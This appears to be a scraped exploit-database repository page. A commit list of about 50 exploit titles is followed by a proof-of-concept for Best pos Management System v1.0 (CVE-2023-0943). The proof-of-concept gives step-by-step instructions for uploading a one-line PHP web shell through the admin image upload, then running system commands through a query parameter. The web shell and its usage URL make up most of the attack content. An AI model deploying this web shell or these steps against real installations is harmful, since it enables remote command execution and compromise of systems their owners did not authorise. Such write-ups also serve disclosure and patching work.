d7c9ba572a
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
21 lines
No EOL
806 B
Text
21 lines
No EOL
806 B
Text
# Exploit Title: Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
|
|
# Google Dork: NA
|
|
# Date: 17/2/2023
|
|
# Exploit Author: Ahmed Ismail (@MrOz1l)
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows 11
|
|
# CVE : (CVE-2023-0943)
|
|
### Steps to Reproduce
|
|
1- Login as Admin Rule
|
|
2- Head to " http://localhost/kruxton/index.php?page=site_settings"
|
|
3- Try to Upload an image here it will be a shell.php
|
|
|
|
```
|
|
shell.php
|
|
``````
|
|
<?php system($_GET['cmd']); ?>
|
|
4- Head to http://localhost/kruxton/assets/uploads/
|
|
5- Access your uploaded Shell
|
|
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami |